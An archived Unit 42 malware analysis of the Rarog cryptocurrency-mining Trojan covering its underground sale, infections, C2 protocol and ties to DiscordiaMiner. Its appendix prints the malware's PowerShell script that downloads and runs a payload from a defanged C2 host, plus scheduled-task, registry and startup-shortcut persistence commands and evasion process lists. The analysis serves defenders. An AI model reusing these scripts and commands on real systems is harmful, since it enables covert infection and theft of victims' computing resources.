{
	"id": "b29db048-619c-479e-becc-4a8e33f7531b",
	"created_at": "2026-04-06T00:21:21.062912Z",
	"updated_at": "2026-04-10T03:21:31.345527Z",
	"deleted_at": null,
	"sha1_hash": "909ce64dc0a7f16d06afa64a22c290f3eb1706c5",
	"title": "Smoking Out the Rarog Cryptocurrency Mining Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1364957,
	"plain_text": "Smoking Out the Rarog Cryptocurrency Mining Trojan\r\nBy Unit 42\r\nPublished: 2018-04-04 · Archived: 2026-04-05 15:01:05 UTC\r\nFor the past few months, Unit 42 researchers have investigated a relatively unknown coin mining Trojan that goes by the\r\nname ‘Rarog’.\r\nRarog has been sold on various underground forums since June 2017 and has been used by countless criminals since then.\r\nTo date, Palo Alto Networks has observed roughly 2,500 unique samples, connecting to 161 different command and control\r\n(C2) servers.\r\nRarog has been seen primarily used to mine the Monero cryptocurrency; however, it has the capability to mine others. It\r\ncomes equipped with a number of features, including providing mining statistics to users, configuring various processor\r\nloads for the running miner, the ability to infect USB devices, and the ability to load additional DLLs on the victim.\r\nRarog is in line with the overall trends we’ve seen regarding the rapidly increasing use of cryptocurrency miners.\r\nAdditionally, Rarog provides an affordable way for new criminals to gain entry into this particular type of malware.\r\nTo date, we have confirmed over 166,000 Rarog-related infections worldwide. The majority of these occur in the\r\nPhilippines, Russia, and Indonesia. 
While a large number of infections have been recorded by various criminals who have\r\nused this mining Trojan, we have seen very little recorded profits: the highest profits we have observed amount to roughly\r\nUS $120.\r\nThe Trojan itself is likely named after a “Raróg”, a fire demon that originates in Slavic mythology and is typically\r\nrepresented as a fiery falcon.\r\n  Rarog on the Underground\r\nThe Rarog Trojan originated on various Russian-speaking criminal underground sites in June 2017, as shown in the image\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 1 of 14\n\nbelow:\r\nFigure 1 Posting in Russian underground forum for Rarog malware\r\nThe malware sells for 6,000 Rubles, or roughly US $104 at today’s exchange rates. Additionally, a guest administration\r\npanel is provided to allow potential buyers the chance to do a “test drive” by interacting with the interface. This interface\r\nmay be seen below:\r\nFigure 2 Rarog administration panel\r\nNote the two Twitter handles shown in the administration panel above. The first handle, “arsenkooo135”, is the same handle\r\nused in various postings for this malware family, including the one shown in Figure 1. We observed the second handle,\r\n“foxovsky”, interacting with other security researchers online. We also tied this handle to a GitHub repository with the same\r\nhandle that hosts various other malware families. 
Evidence suggests that these two individuals are the ones behind this\r\nthreat.\r\nFigure 3 Foxovsky handle on Twitter interacting with security researchers regarding the Rarog malware family\r\nFigure 4 Foxovsky’s GitHub profile, hosting various malware families\r\nAdditionally, we have seen the “foxovsky” GitHub account host the Rarog malware family itself.\r\n  Rarog Malware Family\r\nAt a very high level, the Rarog Mining Trojan performs the following actions:\r\nFigure 5 Rarog flow of execution\r\nThe malware comes equipped with a number of features. It uses multiple mechanisms to maintain persistence on the\r\nvictim’s machine, including the use of the Run registry key, scheduled tasks, and shortcut links in the startup folder. At its\r\ncore, Rarog is a coin mining Trojan and gives the attackers the ability to not only download mining software but configure it\r\nwith any parameters they wish. They’re also able to easily throttle the mining software based on the victim machine’s\r\ncharacteristics.\r\nIn addition to coin mining, Rarog also employs a number of botnet techniques. It allows the attackers to perform a number\r\nof actions, such as downloading and executing other malware, levying DDoS attacks against others, and updating the Trojan,\r\nto name a few. Throughout the malware’s execution, a number of HTTP requests are made to a remote C2 server. 
An\r\noverview of all of these URIs and their description may be found below:\r\nURI Description\r\n/2.0/method/checkConnection To ensure the remote server is responding as expected.\r\n/2.0/method/config Get arguments to supply to miner program.\r\n/2.0/method/delay Retrieve time to sleep before executing miner program.\r\n/2.0/method/error Retrieve information about error message to display to the victim.\r\n/2.0/method/get Get location of miner file based on CPU architecture of victim.\r\n/2.0/method/info Get exe name of miner program.\r\n/2.0/method/setOnline Update statistics for victim on C2 server.\r\n/2.0/method/update Used for updating the Rarog Trojan.\r\n/4.0/method/blacklist Retrieve a list of process names to check against. Should any be running in the foreground, Rarog will suspend mining operations.\r\n/4.0/method/check Query remote C2 server to determine if ID exists.\r\n/4.0/method/cores Retrieve percentage of CPU to use on victim machines for mining.\r\n/4.0/method/installSuccess Query the C2 server for botnet instructions.\r\n/4.0/method/modules Retrieve third-party modules to load on victim.\r\n/4.0/method/threads Determine what tasks to run on the victim machine (USB spreading, helper executables, etc.)\r\n \r\nFor additional information on how the Rarog malware family operates, please refer to the Appendix.\r\n  Victim Telemetry\r\nWe identified a total of 161 C2 servers communicating with the Rarog malware family. A full list may be found in the\r\nAppendix. Looking at the geographic distribution of these C2 servers, we see a high concentration of them located in Russia\r\nand Germany.\r\nFigure 6 Distribution of C2 servers hosting Rarog malware\r\nThe distribution rate of new Rarog samples has varied in the past nine months, with a large spike occurring between late\r\nAugust and late September 2017. 
At its peak, we encountered 187 unique Rarog samples during the week of September 11,\r\n2017.\r\n \r\nFigure 7 New Rarog malware samples encountered over time\r\nThese samples confirm at least 166,000 victims spread across the globe. While infections occur in most regions of the world,\r\nhigh concentrations occur in the Philippines, Russia, and Indonesia, as seen in the figure below:\r\nFigure 8 Rarog infections across the globe\r\nRarog is able to provide telemetry to those who have purchased it, using the third-party MinerGate mining service. We were\r\nable to retrieve a number of MinerGate API keys; however, the profits made by these attackers were minimal at best. The most\r\nprofitable attacker was found to generate roughly 0.58 Monero (XMR), and 54 ByteCoin (BCN). By today’s exchange rates,\r\nthis amounts to $123.68 total. After factoring in the cost of the malware itself at $104, the attackers in question have\r\ngenerated very little income. In most cases, they’ve lost money.\r\n  Ties to Previous Malware Families\r\nIn late October 2017, Kaspersky wrote a blog post about a malware family named ‘DiscordiaMiner’. In this blog post, they\r\ndescribe a cryptocurrency miner that shared a number of characteristics with Rarog. Upon further inspection, they mention\r\nthe author of the program, who is none other than the previously mentioned “foxovsky” user. Indeed, when looking at this\r\nuser’s GitHub account in Figure 4, we saw the source code to this mining Trojan. The last time the source code to this\r\nparticular malware was updated was on May 25th, 2017.\r\nLooking at the source code to DiscordiaMiner, we see a large number of similarities with Rarog. So many, in fact, that we\r\nmight reach the conclusion that Rarog is an evolution of Discordia. Kaspersky’s blog post discussed some drama concerning\r\nthis particular malware family on various underground forums. 
The Trojan’s author was accused of substituting his own cryptocurrency wallet addresses for those of his customers. This\r\ndispute is what ultimately led foxovsky to open-source the DiscordiaMiner program on GitHub. The timeline, with\r\nDiscordiaMiner last updated in May 2017 and Rarog first advertised in June 2017, paints an interesting picture. Based on this\r\ninformation, as well as the heavy code overlap between the malware families, I suspect that foxovsky rebranded DiscordiaMiner\r\nto Rarog and continued development on this newly named malware family. This re-branding allowed him to get away from the\r\nnegativity that was associated with DiscordiaMiner.\r\n  Conclusion\r\nThe Rarog malware family represents a continued trend toward the use of cryptocurrency miners and their demand on the\r\ncriminal underground. While not incredibly sophisticated, Rarog provides an easy entry for many criminals into running a\r\ncryptocurrency mining botnet. The malware has remained relatively unknown for the past nine months barring a few\r\nexceptions. 
As the value of various cryptocurrencies continues to remain high, it is likely that we’ll continue to see\r\nadditional malware families with mining functionality surface.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nAll samples referenced in this blog post are appropriately marked as malicious in WildFire and Traps\r\nAll domains used as C2 servers for Rarog are flagged as malicious\r\nTracking of the Rarog malware family may be done through the AutoFocus Rarog tag\r\nAppendix\r\n \r\nTechnical Malware Analysis\r\nThe file with the following properties was used to conduct this analysis:\r\nMD5 15361551cb2f705f80e95cea6a2a7c04\r\nSHA1 a388e464edeb8230adc955ed6a78540ed1433078\r\nSHA256 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a\r\nCompile Time 2018-03-17 16:36:18 UTC\r\nPDB String D:\\Work\\_Rarog\\Release\\Rarog.pdb\r\n \r\nWhen Rarog is initially executed, the malware will look for the existence of the following file:\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\r\nIn the event this file is missing on the system, Rarog will enter its installation routine, which is outlined below.\r\n  Installation Routine\r\nThe installation routine begins by creating the following hidden directory path:\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\\r\nIt then copies itself to the directory above with a filename of ‘Isass.exe’. This newly copied file is then executed in a new\r\nprocess. 
After this takes place, the malware makes an HTTP POST request as follows:\r\nPOST /2.0/method/checkConnection HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 0\r\nHost: api.polotreck[.]xyz\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.9\r\nDate: Tue, 20 Mar 2018 16:34:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 12\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nc3VjY2Vzcw==\r\nThe response to the above request is simply base64-encoded and decodes to ‘success’. The malware checks the response and\r\nproceeds only if ‘success’ is received.\r\nThe malware makes the following request to determine if the C2 wishes the malware to spawn a fake error message box:\r\nPOST /2.0/method/error HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 9\r\nHost: api.polotreck[.]xyz\r\nprofile=1\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.9\r\nDate: Tue, 20 Mar 2018 16:43:58 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 192\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nVary: Accept-Encoding\r\nMTsxO1N5c3RlbSBFcnJvcjtUaGUgcHJvZ3JhbSBjYW4ndCBzdGFydCBiZWNhdXNlIE1TVkNQMTEwLmRsbCBpcyBtaXNzaW5nIGZyb20geW\r\nThe base64 response above decodes to the following:\r\n“1;1;System Error;The program can't start because MSVCP110.dll is missing from your computer. Try reinstalling the\r\nprogram to fix this problem.”\r\nThe response is split by ‘;’. The first parameter is hardcoded, while the second is used to specify the type of message box to\r\ndisplay. 
The following options are provided:\r\nParameter MessageBox Option\r\n0 No error message displayed.\r\n1 A stop-sign icon appears in the message box.\r\n2 A question-mark icon appears in the message box.\r\n3 An exclamation-point icon appears in the message box.\r\n4 An icon consisting of a lowercase letter i in a circle appears in the message box.\r\nThe third parameter specifies the title of the message box, while the last parameter represents the message. Using the\r\nprevious example, we are presented with the following message:\r\nFigure 9 Fake error message box displayed by Rarog\r\nFinally, Rarog will execute the following command, which kills the current malware instance and deletes it from disk:\r\ncmd.exe /c taskkill /im 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe /f \u0026 erase\r\nC:\\Users\\Administrato\\Desktop\\73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe \u0026\r\nexit\r\n \r\nPost-Installation Routine\r\nAfter the installation routine completes and a new instance of Isass.exe is spawned, this new instance of Rarog will check\r\nfor the existence of the following file:\r\nC:\\ProgramData\\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\\driver.dat\r\nIf this file does not exist, Rarog will create the necessary hidden directory structure, and make a series of HTTP POST\r\nrequests. The first request will be to ‘/2.0/method/checkConnection’ to ensure the remote C2 server is alive. 
The second\r\nrequest is to the following:\r\nPOST /4.0/method/installSuccess HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 9\r\nHost: api.polotreck[.]xyz\r\nbuildID=5.1\u0026hwid={1efdb526-2d21-11e8-a30c-8c8590105ceb}\u0026profile=1\u0026os=Microsoft Windows 7 Ultimate\r\n\u0026platform=x86\u0026processor=Intel(R) Core(TM) i7-7700HQ CPU @ 2.80 GHz\u0026videocard=VMware SVGA 3D\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.9\r\nDate: Tue, 20 Mar 2018 16:43:58 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 192\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\n250\r\nThe response provided by the C2 server is the stored identifier of the victim within the C2 database. This number is stored in\r\nthe ‘driver.dat’ file.\r\nThe following registry key is created to ensure Rarog persists across reboots:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows_Antimalware_Host_Syst -\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\r\nThe following hidden directory is created, and the following three files are written to this location:\r\nC:\\ProgramData\\WindowsAppCertification\\WindowHelperStorageHostSystemThread.ps1\r\nC:\\ProgramData\\WindowsAppCertification\\cert.cmd\r\nC:\\ProgramData\\WindowsAppCertification\\checker.vbs\r\nThe contents of WindowHelperStorageHostSystemThread.ps1 are as follows:\r\n \r\n$path = 'C:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\'\r\n$fpath = $path + 'Isass.exe'\r\n$furl = 'http://api.polotreck[.]xyz/2.0/method/update'\r\n$isfile = Test-Path $fpath\r\nif($isfile -eq 'True') {}\r\nelse{\r\nNew-Item -ItemType directory -Path $path\r\n$WebClient = New-Object System.Net.WebClient\r\n$WebClient.DownloadFile($furl,$fpath)\r\nStart-Process -FilePath $fpath}\r\nThe contents 
of cert.cmd are as follows:\r\n@echo off\r\npowershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file\r\nC:\\ProgramData\\WindowsAppCertification\\WindowHelperStorageHostSystemThread.ps1\r\nThe contents of checker.vbs are as follows:\r\nSet WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.Run \"C:\\ProgramData\\WindowsAppCertification\\cert.cmd\",0\r\nThe following command is executed to create a Scheduled Task to run the checker.vbs script periodically:\r\nschtasks.exe /Create /SC MINUTE /MO 30 /TN \"Windows_Antimalware_Host\" /TR\r\n\"C:\\ProgramData\\WindowsAppCertification\\checker.vbs\" /F\r\nThe following command is executed to create a Scheduled Task to run Isass.exe periodically:\r\nschtasks.exe /Create /SC MINUTE /MO 5 /TN \"Windows_Antimalware_Host_Systm\" /TR\r\n\"C:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\" /F\r\nAdditionally, the following command is executed to generate a shortcut link in the victim’s startup folder:\r\ncmd.exe /c echo Set oWS = WScript.CreateObject(\"WScript.Shell\") \u003e CreateShortcut.vbs \u0026 echo sLinkFile =\r\n\"%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Isass.lnk\" \u003e\u003e\r\nCreateShortcut.vbs \u0026 echo Set oLink = oWS.CreateShortcut(sLinkFile) \u003e\u003e CreateShortcut.vbs \u0026 echo\r\noLink.TargetPath = \"C:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\" \u003e\u003e CreateShortcut.vbs \u0026\r\necho oLink.Save \u003e\u003e CreateShortcut.vbs \u0026 cscript CreateShortcut.vbs \u0026 del CreateShortcut.vbs\r\nThese registry modifications, file writes, and executed commands provide multiple ways for Rarog to persist on the\r\nsystem, both across reboots and in instances where the malware dies or is forcibly closed.\r\nRarog then makes the following POST request to ensure the ID exists on the remote C2 
server:\r\nPOST /4.0/method/check HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Tue, 20 Mar 2018 20:47:52 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 12\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nc3VjY2Vzcw==\r\nAgain, Rarog looks for a response of 'success'. Rarog then makes the following POST request:\r\nPOST /4.0/method/threads HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 0\r\nHost: api.polotreck[.]xyz\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Tue, 20 Mar 2018 20:49:46 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 16\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nMjsxOzE7MTsyOw==\r\nThe decoded response by the C2 server is ‘2;1;1;1;2;’. This data is split via ‘;’ and the values are used to indicate whether\r\ncertain Rarog features are enabled or not. The value of ‘1’ represents ‘On’, while anything else represents ‘Off’.\r\nPosition Name Description\r\n0 USB Devices Searches the machine for removable drives. Copies Rarog to the removable drive with the name of 'autorun.exe'. Also creates an 'autorun.inf' file in the same directory, which will execute 'autorun.exe' when loaded.\r\n1 Helpers Creates the hidden 'C:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\' directory, and copies Isass.exe to 'SecurityHeaIthService.exe', 'SystemldleProcess.exe', and 'winIogon.exe' in this directory.\r\n2 Mining Status Makes a POST request to '/2.0/method/get' to retrieve a URL for a mining executable. 
This file\r\nis stored in the 'C:\\ProgramData\\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\\' directory.\r\n3 Miners Killer Makes a POST request to '/4.0/method/modules'. This provides a list of DLLs that are placed in the 'C:\\ProgramData\\MicrosoftCorporation\\Windows\\Modules\\' folder. These DLLs are then loaded by Rarog. The DLLs in question are expected to have an export function named 'Instance'.\r\n4 Task Manager This does not appear to be used by the malware.\r\n \r\nWhen the ‘Mining Status’ option is enabled, and a miner is successfully downloaded from a remote server, Rarog will make\r\nthe following request to the C2 server:\r\nPOST /2.0/method/config HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 16:55:38 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 108\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nVary: Accept-Encoding\r\nLW8geG1yLnBvb2wubWluZXJnYXRlLmNvbTo0NTU2MCAtdSBtb3JlMnNldEBwcm90b25tYWlsLmNvbSAtcCB4IC1rIC10IHtUSFJFQURTfQ\r\nThe response decodes to the following:\r\n-o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t {THREADS}\r\nThese parameters will be supplied to the mining program upon execution. Prior to running the miner, Rarog will check the\r\nrunning processes on the system for the following strings. 
Should they be encountered, the processes will be killed, and the\r\nexecutable will be deleted from the system.\r\nminergate\r\nstratum\r\ncryptonight\r\nmonerohash\r\nnicehash\r\ndwarfpool\r\nsuprnova\r\nnanopool\r\nxmrpool\r\nThese are common strings associated with mining pools used by individuals when mining various cryptocurrencies.\r\nRarog will make the following request to determine what percentage of the victim’s CPU to use for mining:\r\nPOST /4.0/method/cores HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 17:03:18 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 4\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nNTA=\r\nThe response decodes to a value of ‘50’. Rarog continues to make a request to ‘/4.0/method/blacklist’ to determine what\r\nprocesses should be blacklisted. The server in question did not have a configured blacklist, but an example of what may be\r\nreturned is shown below:\r\ndota2.exe;csgo.exe;WorldOfTanks.exe;TslGame.exe;gta5.exe;photoshop.exe;vegas_pro.exe;premier.exe;Prey.exe;Overwatch.exe;MK10.exe;Minecr\r\nThis list represents common resource-intensive applications, such as games, that Rarog will continually monitor for. 
In the\r\nevent such a program is running in the foreground, Rarog will suspend mining operations.\r\nThe malware then makes the following request to retrieve the amount of time that Rarog will sleep before mining on the\r\ntarget victim:\r\nPOST /2.0/method/delay HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 17:11:05 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 5\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\n10000\r\nPrior to continuing, Rarog will check the running processes on the system for the following common security applications,\r\nand will not proceed if found:\r\nNetMonitor\r\nTaskmgr.exe\r\nProcess Killer\r\nKillProcess\r\nSystem Explorer\r\nAnVir\r\nProcess Hacker\r\nRarog takes the previously collected CPU usage percentage and applies it to the number of CPU cores found on the system.\r\nAs an example, if a system had four CPU cores, and the setting was at 50%, Rarog could configure the miner to use 2\r\nthreads (0.5 x 4). 
The following mining command is executed by Rarog:\r\nC:\\ProgramData\\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\\xmrig32.exe -o\r\nxmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t 1\r\n \r\nBotnet Functionality\r\nRarog will periodically make HTTP POST requests to the following:\r\nPOST /2.0/method/setOnline HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 16\r\nHost: api.polotreck[.]xyz\r\nid=250\u0026build=5.1\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 17:28:27 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 0\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nThis particular URI has the ability to provide additional tasks for Rarog to perform. The following commands are\r\nsupported:\r\nCommand Description\r\ninstall Download and execute specified file\r\nopen_url Open the specified URL in browser\r\nddos Perform DDoS operations against specified target\r\nupdate Update Rarog Trojan from specified URL\r\nrestart_bot Restart Rarog Trojan\r\ndelete_bot Delete Rarog Trojan\r\n \r\nSHA256 Hashes\r\nFor a full list of SHA256 hashes and their first encountered timestamp, please refer to the following file.\r\n  C2 Servers\r\nFor a full list of C2 servers and their first encountered timestamp, please refer to the following file.\r\n  File and Folder 
Artifacts\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\_Isass.exe\r\nC:\\ProgramData\\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\\\r\nC:\\ProgramData\\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\\driver.dat\r\nC:\\ProgramData\\WindowsAppCertification\\\r\nC:\\ProgramData\\WindowsAppCertification\\WindowHelperStorageHostSystemThread.ps1\r\nC:\\ProgramData\\WindowsAppCertification\\cert.cmd\r\nC:\\ProgramData\\WindowsAppCertification\\checker.vbs\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\SecurityHeaIthService.exe\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\SystemldleProcess.exe\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\winIogon.exe\r\nC:\\ProgramData\\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\\\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Modules\r\n  Registry Artifacts\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows_Antimalware_Host_Syst\r\nSource: https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/"
	],
	"report_names": [
		"unit42-smoking-rarog-mining-trojan"
	],
	"threat_actors": [],
	"ts_created_at": 1775434881,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/909ce64dc0a7f16d06afa64a22c290f3eb1706c5.pdf",
		"text": "https://archive.orkl.eu/909ce64dc0a7f16d06afa64a22c290f3eb1706c5.txt",
		"img": "https://archive.orkl.eu/909ce64dc0a7f16d06afa64a22c290f3eb1706c5.jpg"
	}
}